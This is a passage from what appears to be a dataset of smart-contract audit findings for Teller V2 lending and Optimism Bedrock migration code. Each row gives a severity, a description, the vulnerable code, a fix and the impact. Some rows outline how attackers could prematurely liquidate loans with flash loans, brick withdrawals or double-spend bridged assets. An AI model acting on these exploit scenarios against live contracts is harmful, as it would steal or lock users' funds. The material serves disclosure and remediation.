$$\\nand $kr = r_\\Delta$ gives us:\\n$$ E = P r (1+r)^n \\frac{(1+r_\\Delta)}{(1+r_\\Delta)((1+r)^n - 1) + r_\\Delta} $$\\nTo check that this is correct, $r_\\Delta = 0$ (no extra cycle added) should give us the regular EMI equation. Which we can see is true for the above. And $r_\\Delta = r$ (a full extra cycle added) should give us the EMI equation but with $n+1$ which we can also see it does.\\nHere are the code changes to use this, together with changes to `V2Calculations.sol` to calculate the last period correctly:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol\\nindex 1cce8da..1ad5bcf 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/V2Calculations.sol\\n@@ // Remove the line below\\n90,30 // Add the line below\\n90,15 @@ library V2Calculations {\\n uint256 owedTime = _timestamp // Remove the line below\\n uint256(_lastRepaidTimestamp);\\n interest_ = (interestOwedInAYear * owedTime) / daysInYear;\\n \\n// Remove the line below\\n // Cast to int265 to avoid underflow errors (negative means loan duration has passed)\\n// Remove the line below\\n int256 durationLeftOnLoan = int256(\\n// Remove the line below\\n uint256(_bid.loanDetails.loanDuration)\\n// Remove the line below\\n ) // Remove the line below\\n\\n// Remove the line below\\n (int256(_timestamp) // Remove the line below\\n\\n// Remove the line below\\n int256(uint256(_bid.loanDetails.acceptedTimestamp)));\\n// Remove the line below\\n bool isLastPaymentCycle = durationLeftOnLoan <\\n// Remove the line below\\n int256(uint256(_bid.terms.paymentCycle)) || // Check if current payment cycle is within or beyond the last one\\n// Remove the line below\\n owedPrincipal_ // Add the line below\\n interest_ <= _bid.terms.paymentCycleAmount; // Check if what is left to pay is less than the payment cycle amount\\n// Remove the line below\\n\\n if (_bid.paymentType == PaymentType.Bullet) {\\n// Remove the line below\\n if (isLastPaymentCycle) {\\n// Remove the line below\\n duePrincipal_ = owedPrincipal_;\\n// Remove the line below\\n }\\n// Add the line below\\n duePrincipal_ = owedPrincipal_;\\n } else {\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n// Remove the line below\\n uint256 maxCycleOwed = isLastPaymentCycle\\n// Remove the line below\\n ? owedPrincipal_ // Add the line below\\n interest_\\n// Remove the line below\\n : _bid.terms.paymentCycleAmount;\\n \\n // Calculate accrued amount due since last repayment\\n// Remove the line below\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n// Add the line below\\n uint256 owedAmount = (_bid.terms.paymentCycleAmount * owedTime) /\\n _bid.terms.paymentCycle;\\n duePrincipal_ = Math.min(owedAmount // Remove the line below\\n interest_, owedPrincipal_);\\n }\\n```\\n\\nAnd then NumbersLib.sol:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol\\nindex f34dd9c..8ca48bc 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/teller// Remove the line below\\nprotocol// Remove the line below\\nv2/packages/contracts/contracts/libraries/NumbersLib.sol\\n@@ // Remove the line below\\n120,7 // Add the line below\\n120,8 @@ library NumbersLib {\\n );\\n \\n // Number of payment cycles for the duration of the loan\\n// Remove the line below\\n uint256 n = Math.ceilDiv(loanDuration, cycleDuration);\\n// Add the line below\\n uint256 n = loanDuration/ cycleDuration;\\n// Add the line below\\n uint256 rest = loanDuration%cycleDuration;\\n \\n uint256 one = WadRayMath.wad();\\n uint256 r = WadRayMath.pctToWad(apr).wadMul(cycleDuration).wadDiv(\\n@@ // Remove the line below\\n128,8 // Add the line below\\n129,16 @@ library NumbersLib {\\n );\\n uint256 exp = (one // Add the line below\\n r).wadPow(n);\\n uint256 numerator = principal.wadMul(r).wadMul(exp);\\n// Remove the line below\\n uint256 denominator = exp // Remove the line below\\n one;\\n \\n// Remove the line below\\n return numerator.wadDiv(denominator);\\n// Add the line below\\n if(rest==0) {\\n// Add the line below\\n // duration is multiple of cycle\\n// Add the line below\\n uint256 denominator = exp // Remove the line below\\n one;\\n// Add the line below\\n return numerator.wadDiv(denominator);\\n// Add the line below\\n }\\n// Add the line below\\n // duration is an uneven cycle\\n// Add the line below\\n uint256 rDelta = WadRayMath.pctToWad(apr).wadMul(rest).wadDiv(daysInYear);\\n// Add the line below\\n uint256 n1 = numerator.wadMul(one // Add the line below\\n rDelta);\\n// Add the line below\\n uint256 denom = ((one // Add the line below\\n rDelta).wadMul(exp // Remove the line below\\n one)) // Add the line below\\n rDelta;\\n// Add the line below\\n return n1.wadDiv(denom);\\n }\\n }\\n```\\n",A borrower taking a loan might not be able to pay the last payment cycle and be liquidated. At the worst possible time since they've paid the whole loan on schedule up to the last installment. The liquidator just need to pay the last installment to take the whole collateral.\\nThis requires the loan to not be a multiple of the payment cycle which might sound odd. But since a year is 365 days and a common payment cycle is 30 days I imagine there can be quite a lot of loans that after 360 days will end up in this issue.\\nThere is also nothing stopping an unknowing borrower from placing a bid or accepting a commitment with an odd duration.,```\\nFile: libraries/V2Calculations.sol\\n\\n 93: // Cast to int265 to avoid underflow errors (negative means loan duration has passed)\\n 94: int256 durationLeftOnLoan = int256(\\n 95: uint256(_bid.loanDetails.loanDuration)\\n 96: ) -\\n 97: (int256(_timestamp) -\\n 98: int256(uint256(_bid.loanDetails.acceptedTimestamp)));\\n 99: bool isLastPaymentCycle = durationLeftOnLoan <\\n int256(uint256(_bid.terms.paymentCycle)) || // Check if current payment cycle is within or beyond the last one\\n owedPrincipal_ + interest_ <= _bid.terms.paymentCycleAmount; // Check if what is left to pay is less than the payment cycle amount\\n```\\n +setLenderManager may cause some Lenders to lose their assets,medium,"If the contract's lenderManager changes, repaid assets will be sent to the old lenderManager\\nsetLenderManager is used to change the lenderManager address of the contract\\n```\\n function setLenderManager(address _lenderManager)\\n external\\n reinitializer(8)\\n onlyOwner\\n {\\n _setLenderManager(_lenderManager);\\n }\\n\\n function _setLenderManager(address _lenderManager)\\n internal\\n onlyInitializing\\n {\\n require(\\n _lenderManager.isContract(),\\n ""LenderManager must be a contract""\\n );\\n lenderManager = ILenderManager(_lenderManager);\\n }\\n```\\n\\nclaimLoanNFT will change the bid.lender to the current lenderManager\\n```\\n function claimLoanNFT(uint256 _bidId)\\n external\\n acceptedLoan(_bidId, ""claimLoanNFT"")\\n whenNotPaused\\n {\\n // Retrieve bid\\n Bid storage bid = bids[_bidId];\\n\\n address sender = _msgSenderForMarket(bid.marketplaceId);\\n require(sender == bid.lender, ""only lender can claim NFT"");\\n // mint an NFT with the lender manager\\n lenderManager.registerLoan(_bidId, sender);\\n // set lender address to the lender manager so we know to check the owner of the NFT for the true lender\\n bid.lender = address(lenderManager);\\n }\\n```\\n\\nIn getLoanLender, if the bid.lender is the current lenderManager, the owner of the NFT will be returned as the lender, and the repaid assets will be sent to the lender.\\n```\\n function getLoanLender(uint256 _bidId)\\n public\\n view\\n returns (address lender_)\\n {\\n lender_ = bids[_bidId].lender;\\n\\n if (lender_ == address(lenderManager)) {\\n return lenderManager.ownerOf(_bidId);\\n }\\n }\\n// rest of code\\n address lender = getLoanLender(_bidId);\\n\\n // Send payment to the lender\\n bid.loanDetails.lendingToken.safeTransferFrom(\\n _msgSenderForMarket(bid.marketplaceId),\\n lender,\\n paymentAmount\\n );\\n```\\n\\nIf setLenderManager is called to change the lenderManager, in getLoanLender, since the bid.lender is not the current lenderManager, the old lenderManager address will be returned as the lender, and the repaid assets will be sent to the old lenderManager, resulting in the loss of the lender's assets","Consider using MAGIC_NUMBER as bid.lender in claimLoanNFT and using that MAGIC_NUMBER in getLoanLender to do the comparison.\\n```\\n// Add the line below\\n address MAGIC_NUMBER = 0x// rest of code;\\n function claimLoanNFT(uint256 _bidId)\\n external\\n acceptedLoan(_bidId, ""claimLoanNFT"")\\n whenNotPaused\\n {\\n // Retrieve bid\\n Bid storage bid = bids[_bidId];\\n\\n address sender = _msgSenderForMarket(bid.marketplaceId);\\n require(sender == bid.lender, ""only lender can claim NFT"");\\n // mint an NFT with the lender manager\\n lenderManager.registerLoan(_bidId, sender);\\n // set lender address to the lender manager so we know to check the owner of the NFT for the true lender\\n// Remove the line below\\n bid.lender = address(lenderManager);\\n// Add the line below\\n bid.lender = MAGIC_NUMBER;\\n }\\n// rest of code\\n function getLoanLender(uint256 _bidId)\\n public\\n view\\n returns (address lender_)\\n {\\n lender_ = bids[_bidId].lender;\\n\\n// Remove the line below\\n if (lender_ == address(lenderManager)) {\\n// Add the line below\\n if (lender_ == MAGIC_NUMBER) {\\n return lenderManager.ownerOf(_bidId);\\n }\\n }\\n```\\n",It may cause some Lenders to lose their assets,"```\\n function setLenderManager(address _lenderManager)\\n external\\n reinitializer(8)\\n onlyOwner\\n {\\n _setLenderManager(_lenderManager);\\n }\\n\\n function _setLenderManager(address _lenderManager)\\n internal\\n onlyInitializing\\n {\\n require(\\n _lenderManager.isContract(),\\n ""LenderManager must be a contract""\\n );\\n lenderManager = ILenderManager(_lenderManager);\\n }\\n```\\n" +A borrower/lender or liquidator will fail to withdraw the collateral assets due to reaching a gas limit,medium,"Within the TellerV2#submitBid(), there is no limitation that how many collateral assets a borrower can assign into the `_collateralInfo` array parameter.\\nThis lead to some bad scenarios like this due to reaching gas limit:\\nA borrower or a lender fail to withdraw the collateral assets when the loan would not be liquidated.\\nA liquidator will fail to withdraw the collateral assets when the loan would be liquidated.\\n```\\nstruct Collateral {\\n CollateralType _collateralType;\\n uint256 _amount;\\n uint256 _tokenId;\\n address _collateralAddress;\\n}\\n```\\n\\n```\\n /**\\n * Since collateralInfo is mapped (address assetAddress => Collateral) that means\\n * that only a single tokenId per nft per loan can be collateralized.\\n * Ex. Two bored apes cannot be used as collateral for a single loan.\\n */\\n struct CollateralInfo {\\n EnumerableSetUpgradeable.AddressSet collateralAddresses;\\n mapping(address => Collateral) collateralInfo;\\n }\\n```\\n\\n```\\n // bidIds -> validated collateral info\\n mapping(uint256 => CollateralInfo) internal _bidCollaterals;\\n```\\n\\n```\\n function submitBid(\\n address _lendingToken,\\n uint256 _marketplaceId,\\n uint256 _principal,\\n uint32 _duration,\\n uint16 _APR,\\n string calldata _metadataURI,\\n address _receiver,\\n Collateral[] calldata _collateralInfo /// @audit\\n ) public override whenNotPaused returns (uint256 bidId_) {\\n // rest of code\\n bool validation = collateralManager.commitCollateral(\\n bidId_,\\n _collateralInfo /// @audit \\n );\\n // rest of code\\n```\\n\\n```\\n /**\\n * @notice Checks the validity of a borrower's multiple collateral balances and commits it to a bid.\\n * @param _bidId The id of the associated bid.\\n * @param _collateralInfo Additional information about the collateral assets.\\n * @return validation_ Boolean indicating if the collateral balances were validated.\\n */\\n function commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo /// @audit\\n ) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo);\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) { \\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info); /// @audit\\n }\\n }\\n }\\n```\\n\\n```\\n /**\\n * @notice Checks the validity of a borrower's collateral balance and commits it to a bid.\\n * @param _bidId The id of the associated bid.\\n * @param _collateralInfo Additional information about the collateral asset.\\n */\\n function _commitCollateral(\\n uint256 _bidId,\\n Collateral memory _collateralInfo\\n ) internal virtual {\\n CollateralInfo storage collateral = _bidCollaterals[_bidId];\\n collateral.collateralAddresses.add(_collateralInfo._collateralAddress);\\n collateral.collateralInfo[\\n _collateralInfo._collateralAddress\\n ] = _collateralInfo; /// @audit\\n // rest of code\\n```\\n\\n```\\n /**\\n * @notice Withdraws deposited collateral from the created escrow of a bid that has been successfully repaid.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n */\\n function withdraw(uint256 _bidId) external {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n if (bidState == BidState.PAID) {\\n _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId)); /// @audit \\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId)); /// @audit \\n // rest of code\\n```\\n\\n```\\n /**\\n * @notice Sends the deposited collateral to a liquidator of a bid.\\n * @notice Can only be called by the protocol.\\n * @param _bidId The id of the liquidated bid.\\n * @param _liquidatorAddress The address of the liquidator to send the collateral to.\\n */\\n function liquidateCollateral(uint256 _bidId, address _liquidatorAddress)\\n external\\n onlyTellerV2\\n {\\n if (isBidCollateralBacked(_bidId)) {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n require(\\n bidState == BidState.LIQUIDATED,\\n ""Loan has not been liquidated""\\n );\\n _withdraw(_bidId, _liquidatorAddress); /// @audit\\n }\\n }\\n```\\n\\n```\\n /**\\n * @notice Withdraws collateral to a given receiver's address.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n * @param _receiver The address to withdraw the collateral to.\\n */\\n function _withdraw(uint256 _bidId, address _receiver) internal virtual {\\n for (\\n uint256 i;\\n i < _bidCollaterals[_bidId].collateralAddresses.length(); /// @audit\\n i++\\n ) {\\n // Get collateral info\\n Collateral storage collateralInfo = _bidCollaterals[_bidId]\\n .collateralInfo[\\n _bidCollaterals[_bidId].collateralAddresses.at(i)\\n ];\\n // Withdraw collateral from escrow and send it to bid lender\\n ICollateralEscrowV1(_escrows[_bidId]).withdraw( /// @audit\\n collateralInfo._collateralAddress,\\n collateralInfo._amount,\\n _receiver\\n );\\n```\\n\\nHowever, within the TellerV2#submitBid(), there is no limitation that how many collateral assets a borrower can assign into the `_collateralInfo` array parameter.\\nThis lead to a bad scenario like below:\\n① A borrower assign too many number of the collateral assets (ERC20/ERC721/ERC1155) into the `_collateralInfo` array parameter when the borrower call the TellerV2#submitBid() to submit a bid.\\n② Then, a lender accepts the bid via calling the TellerV2#lenderAcceptBid()\\n③ Then, a borrower or a lender try to withdraw the collateral, which is not liquidated, by calling the CollateralManager#withdraw(). Or, a liquidator try to withdraw the collateral, which is liquidated, by calling the CollateralManager#liquidateCollateral()\\n④ But, the transaction of the CollateralManager#withdraw() or the CollateralManager#liquidateCollateral() will be reverted in the for-loop of the CollateralManager#_withdraw() because that transaction will reach a gas limit.","Within the TellerV2#submitBid(), consider adding a limitation about how many collateral assets a borrower can assign into the `_collateralInfo` array parameter.","Due to reaching gas limit, some bad scenarios would occur like this:\\nA borrower or a lender fail to withdraw the collateral assets when the loan would not be liquidated.\\nA liquidator will fail to withdraw the collateral assets when the loan would be liquidated.",```\\nstruct Collateral {\\n CollateralType _collateralType;\\n uint256 _amount;\\n uint256 _tokenId;\\n address _collateralAddress;\\n}\\n```\\n +Premature Liquidation When a Borrower Pays early,medium,"On TellerV2 markets, whenever a borrower pays early in one payment cycle, they could be at risk to be liquidated in the next payment cycle. And this is due to a vulnerability in the liquidation logic implemented in `_canLiquidateLoan`. Note: This issue is submitted separately from issue #2 because the exploit is based on user behaviors regardless of a specific market setting. And the vulnerability might warrant a change in the liquidation logic.\\nIn TellerV2.sol, the sole liquidation logic is dependent on the time gap between now and the previous payment timestamp. But a user might decide to pay at any time within a given payment cycle, which makes the time gap unreliable and effectively renders this logic vulnerable to exploitation.\\n```\\n return (uint32(block.timestamp) -\\n _liquidationDelay -\\n lastRepaidTimestamp(_bidId) >\\n bidDefaultDuration[_bidId]);\\n```\\n\\nSuppose a scenario where a user takes on a loan on a market with 3 days payment cycle and 3 days paymentDefaultDuration. And the loan is 14 days in duration. The user decided to make the first minimal payment an hour after receiving the loan, and the next payment due date is after the sixth day. Now 5 days passed since the user made the first payment, and a liquidator comes in and liquidates the loan and claims the collateral before the second payment is due.\\nHere is a test to show proof of concept for this scenario.","Consider using the current timestamp - previous payment due date instead of just `lastRepaidTimestamp` in the liquidation check logic. Also, add the check to see whether a user is late on a payment in `_canLiquidateLoan`.","Given the fact that this vulnerability is not market specific and that users can pay freely during a payment cycle, it's quite easy for a liquidator to liquidate loans prematurely. And the effect might be across multiple markets.\\nWhen there are proportional collaterals, the exploit can be low cost. An attacker could take on flash loans to pay off the principal and interest, and the interest could be low when early in the loan duration. The attacker would then sell the collateral received in the same transaction to pay off flash loans and walk away with profits.",```\\n return (uint32(block.timestamp) -\\n _liquidationDelay -\\n lastRepaidTimestamp(_bidId) >\\n bidDefaultDuration[_bidId]);\\n```\\n +"All migrated withdrarwals that require more than 135,175 gas may be bricked",high,"Migrated withdrawals are given an ""outer"" (Portal) gas limit of `calldata cost + 200,000`, and an ""inner"" (CrossDomainMessenger) gas limit of `0`. The assumption is that the CrossDomainMessenger is replayable, so there is no need to specify a correct gas limit.\\nThis is an incorect assumption. For any withdrawals that require more than 135,175 gas, insufficient gas can be sent such that CrossDomainMessenger's external call reverts and the remaining 1/64th of the gas sent is not enough for replayability to be encoded in the Cross Domain Messenger.\\nHowever, the remaining 1/64th of gas in the Portal is sufficient to have the transaction finalize, so that the Portal will not process the withdrawal again.\\nWhen old withdrawals are migrated to Bedrock, they are encoded as calls to `L1CrossDomainMessenger.relayMessage()` as follows:\\n```\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(""cannot migrate withdrawal: %w"", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.XDomainNonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n ""relayMessage"",\\n versionedNonce,\\n withdrawal.XDomainSender,\\n withdrawal.XDomainTarget,\\n value,\\n new(big.Int), // <= THIS IS THE INNER GAS LIMIT BEING SET TO ZERO\\n []byte(withdrawal.XDomainData),\\n )\\n if err != nil {\\n return nil, fmt.Errorf(""cannot abi encode relayMessage: %w"", err)\\n }\\n\\n gasLimit := MigrateWithdrawalGasLimit(data)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit), // <= THIS IS THE OUTER GAS LIMIT BEING SET\\n data,\\n )\\n return w, nil\\n}\\n```\\n\\nAs we can see, the `relayMessage()` call uses a gasLimit of zero (see comments above), while the outer gas limit is calculated by the `MigrateWithdrawalGasLimit()` function:\\n```\\nfunc MigrateWithdrawalGasLimit(data []byte) uint64 {\\n // Compute the cost of the calldata\\n dataCost := uint64(0)\\n for _, b := range data {\\n if b == 0 {\\n dataCost += params.TxDataZeroGas\\n } else {\\n dataCost += params.TxDataNonZeroGasEIP2028\\n }\\n }\\n\\n // Set the outer gas limit. This cannot be zero\\n gasLimit := dataCost + 200_000\\n // Cap the gas limit to be 25 million to prevent creating withdrawals\\n // that go over the block gas limit.\\n if gasLimit > 25_000_000 {\\n gasLimit = 25_000_000\\n }\\n\\n return gasLimit\\n}\\n```\\n\\nThis calculates the outer gas limit value by adding the calldata cost to 200,000.\\nLet's move over to the scenario in which these values are used to see why they can cause a problem.\\nWhen a transaction is proven, we can call `OptimismPortal.finalizeWithdrawalTransaction()` to execute the transaction. In the case of migrated withdrawals, this executes the following flow:\\n`OptimismPortal` calls to `L1CrossDomainMessenger` with a gas limit of `200,000 + calldata`\\nThis guarantees remaining gas for continued execution after the call of `(200_000 + calldata) * 64/63 * 1/64 > 3174`\\nXDM uses `41,002` gas before making the call, leaving `158,998` remaining for the call\\nThe `SafeCall.callWithMinGas()` succeeds, since the inner gas limit is set to 0\\nIf the call uses up all of the avaialble gas (succeeding or reverting), we are left with `158,998` * 1/64 = 2,484 for the remaining execution\\nThe remaining execution includes multiple SSTOREs which totals `23,823` gas, resulting in an OutOfGas revert\\nIn fact, if the call uses any amount greater than `135,175`, we will have less than `23,823` gas remaining and will revert\\nAs a result, none of the updates to `L1CrossDomainMessenger` occur, and the transaction is not marked in `failedMessages` for replayability\\nHowever, the remaining `3174` gas is sufficient to complete the transction on the `OptimismPortal`, which sets `finalizedWithdrawals[hash] = true` and locks the withdrawals from ever being made again","There doesn't seem to be an easy fix for this, except to adjust the migration process so that migrated withdrawals are directly saved as `failedMessages` on the `L1CrossDomainMessenger` (and marked as `finalizedWithdrawals` on the OptimismPortal), rather than needing to be reproven through the normal flow.","Any migrated withdrawal that uses more than `135,175` gas will be bricked if insufficient gas is sent. This could be done by a malicious attacker bricking thousands of pending withdrawals or, more likely, could happen to users who accidentally executed their withdrawal with too little gas and ended up losing it permanently.","```\\nfunc MigrateWithdrawal(withdrawal *LegacyWithdrawal, l1CrossDomainMessenger *common.Address) (*Withdrawal, error) {\\n // Attempt to parse the value\\n value, err := withdrawal.Value()\\n if err != nil {\\n return nil, fmt.Errorf(""cannot migrate withdrawal: %w"", err)\\n }\\n\\n abi, err := bindings.L1CrossDomainMessengerMetaData.GetAbi()\\n if err != nil {\\n return nil, err\\n }\\n\\n // Migrated withdrawals are specified as version 0. Both the\\n // L2ToL1MessagePasser and the CrossDomainMessenger use the same\\n // versioning scheme. Both should be set to version 0\\n versionedNonce := EncodeVersionedNonce(withdrawal.XDomainNonce, new(big.Int))\\n // Encode the call to `relayMessage` on the `CrossDomainMessenger`.\\n // The minGasLimit can safely be 0 here.\\n data, err := abi.Pack(\\n ""relayMessage"",\\n versionedNonce,\\n withdrawal.XDomainSender,\\n withdrawal.XDomainTarget,\\n value,\\n new(big.Int), // <= THIS IS THE INNER GAS LIMIT BEING SET TO ZERO\\n []byte(withdrawal.XDomainData),\\n )\\n if err != nil {\\n return nil, fmt.Errorf(""cannot abi encode relayMessage: %w"", err)\\n }\\n\\n gasLimit := MigrateWithdrawalGasLimit(data)\\n\\n w := NewWithdrawal(\\n versionedNonce,\\n &predeploys.L2CrossDomainMessengerAddr,\\n l1CrossDomainMessenger,\\n value,\\n new(big.Int).SetUint64(gasLimit), // <= THIS IS THE OUTER GAS LIMIT BEING SET\\n data,\\n )\\n return w, nil\\n}\\n```\\n" +"Legacy withdrawals can be relayed twice, causing double spending of bridged assets",high,"`L2CrossDomainMessenger.relayMessage` checks that legacy messages have not been relayed by reading from the `successfulMessages` state variable, however the contract's storage will wiped during the migration to Bedrock and `successfulMessages` will be empty after the deployment of the contract. The check will always pass, even if a legacy message have already been relayed using its v0 hash. As a result, random withdrawal messages, as well as messages from malicious actors, can be relayed multiple times during the migration: first, as legacy v0 messages (before the migration); then, as Bedrock v1 messages (during the migration).\\nL2CrossDomainMessenger inherits from CrossDomainMessenger, which inherits from `CrossDomainMessengerLegacySpacer0`, `CrossDomainMessengerLegacySpacer1`, assuming that the contract will be deployed at an address with existing state-the two spacer contracts are needed to ""skip"" the slots occupied by previous implementations of the contract.\\nDuring the migration, legacy (i.e. pre-Bedrock) withdrawal messages will be converted to Bedrock messages-they're expected to call the `relayMessage` function of `L2CrossDomainMessenger`. The `L2CrossDomainMessenger.relayMessage` function checks that the relayed legacy message haven't been relayed already:\\n```\\n// If the message is version 0, then it's a migrated legacy withdrawal. We therefore need\\n// to check that the legacy version of the message has not already been relayed.\\nif (version == 0) {\\n bytes32 oldHash = Hashing.hashCrossDomainMessageV0(_target, _sender, _message, _nonce);\\n require(\\n successfulMessages[oldHash] == false,\\n ""CrossDomainMessenger: legacy withdrawal already relayed""\\n );\\n}\\n```\\n\\nIt reads a V0 message hash from the `successfulMessages` state variable, assuming that the content of the variable is preserved during the migration. However, the state and storage of all predeployed contracts is wiped during the migration:\\n```\\n// We need to wipe the storage of every predeployed contract EXCEPT for the GovernanceToken,\\n// WETH9, the DeployerWhitelist, the LegacyMessagePasser, and LegacyERC20ETH. We have verified\\n// that none of the legacy storage (other than the aforementioned contracts) is accessible and\\n// therefore can be safely removed from the database. Storage must be wiped before anything\\n// else or the ERC-1967 proxy storage slots will be removed.\\nif err := WipePredeployStorage(db); err != nil {\\n return nil, fmt.Errorf(""cannot wipe storage: %w"", err)\\n}\\n```\\n\\nAlso notice that withdrawals are migrated after predeploys were wiped and deployed-predeploys will have empty storage at the time withdrawals are migrated.\\nMoreover, if we check the code at the `L2CrossDomainMessenger` address of the current version of Optimism, we'll see that the contract's storage layout is different from the layout of the `CrossDomainMessengerLegacySpacer0` and `CrossDomainMessengerLegacySpacer1` contracts: there are no gaps and other spacer slots; `successfulMessages` is the second slot of the contract. Thus, even if there were no wiping, the `successfulMessages` mapping of the new `L2CrossDomainMessenger` contract would still be empty.","Consider cleaning up the storage layout of `L1CrossDomainMessenger`, `L2CrossDomainMessenger` and other proxied contracts.\\nIn the PreCheckWithdrawals function, consider reading withdrawal hashes from the `successfulMessages` mapping of the old `L2CrossDomainMessenger` contract and checking if the values are set. Successful withdrawals should be skipped at this point to filter out legacy withdrawals that have already been relayed.\\nConsider removing the check from the `relayMessage` function, since the check will be useless due to the empty state of the contract.","Withdrawal messages can be relayed twice: once right before and once during the migration. ETH and ERC20 tokens can be withdrawn twice, which is basically double spending of bridged assets.","```\\n// If the message is version 0, then it's a migrated legacy withdrawal. We therefore need\\n// to check that the legacy version of the message has not already been relayed.\\nif (version == 0) {\\n bytes32 oldHash = Hashing.hashCrossDomainMessageV0(_target, _sender, _message, _nonce);\\n require(\\n successfulMessages[oldHash] == false,\\n ""CrossDomainMessenger: legacy withdrawal already relayed""\\n );\\n}\\n```\\n" +The formula used in ````SafeCall.callWithMinGas()```` is wrong,high,"The formula used in `SafeCall.callWithMinGas()` is not fully complying with EIP-150 and EIP-2929, the actual gas received by the sub-contract can be less than the required `_minGas`. Withdrawal transactions can be finalized with less than specified gas limit, may lead to loss of funds.\\n```\\nFile: contracts\\libraries\\SafeCall.sol\\n function callWithMinGas(\\n address _target,\\n uint256 _minGas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n // Assertion: gasleft() >= ((_minGas + 200) * 64) / 63\\n //\\n // Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call\\n // frame may be passed to a subcontext, we need to ensure that the gas will not be\\n // truncated to hold this function's invariant: ""If a call is performed by\\n // `callWithMinGas`, it must receive at least the specified minimum gas limit."" In\\n // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL`\\n // opcode, so it is factored in with some extra room for error.\\n if lt(gas(), div(mul(64, add(_minGas, 200)), 63)) {\\n // Store the ""Error(string)"" selector in scratch space.\\n mstore(0, 0x08c379a0)\\n // Store the pointer to the string length in scratch space.\\n mstore(32, 32)\\n // Store the string.\\n //\\n // SAFETY:\\n // - We pad the beginning of the string with two zero bytes as well as the\\n // length (24) to ensure that we override the free memory pointer at offset\\n // 0x40. This is necessary because the free memory pointer is likely to\\n // be greater than 1 byte when this function is called, but it is incredibly\\n // unlikely that it will be greater than 3 bytes. As for the data within\\n // 0x60, it is ensured that it is 0 due to 0x60 being the zero offset.\\n // - It's fine to clobber the free memory pointer, we're reverting.\\n mstore(88, 0x0000185361666543616c6c3a204e6f7420656e6f75676820676173)\\n\\n // Revert with 'Error(""SafeCall: Not enough gas"")'\\n revert(28, 100)\\n }\\n\\n // The call will be supplied at least (((_minGas + 200) * 64) / 63) - 49 gas due to the\\n // above assertion. This ensures that, in all circumstances, the call will\\n // receive at least the minimum amount of gas specified.\\n // We can prove this property by solving the inequalities:\\n // ((((_minGas + 200) * 64) / 63) - 49) >= _minGas\\n // ((((_minGas + 200) * 64) / 63) - 51) * (63 / 64) >= _minGas\\n // Both inequalities hold true for all possible values of `_minGas`.\\n _success := call(\\n gas(), // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 32), // inloc\\n mload(_calldata), // inlen\\n 0x00, // outloc\\n 0x00 // outlen\\n )\\n }\\n return _success;\\n }\\n```\\n\\nThe current formula used in `SafeCall.callWithMinGas()` involves two issues.\\nFirstly, the `63/64` rule is not the whole story of EIP-150 for the `CALL` opcode, let's take a look at the implementation of EIP-150, a `base` gas is subtracted before applying `63/64` rule.\\n```\\nfunc callGas(isEip150 bool, availableGas, base uint64, callCost *uint256.Int) (uint64, error) {\\n if isEip150 {\\n availableGas = availableGas - base\\n gas := availableGas - availableGas/64\\n // If the bit length exceeds 64 bit we know that the newly calculated ""gas"" for EIP150\\n // is smaller than the requested amount. Therefore we return the new gas instead\\n // of returning an error.\\n if !callCost.IsUint64() || gas < callCost.Uint64() {\\n return gas, nil\\n }\\n }\\n if !callCost.IsUint64() {\\n return 0, ErrGasUintOverflow\\n }\\n\\n return callCost.Uint64(), nil\\n}\\n```\\n\\nThe `base` gas is calculated in `gasCall()` of `gas_table.go`, which is subject to\\n```\\n(1) L370~L376: call to a new account\\n(2) L377~L379: call with non zero value\\n(3) L380~L383: memory expansion\\n```\\n\\nThe `(1)` and `(3)` are irrelevant in this case, but `(2)` should be taken into 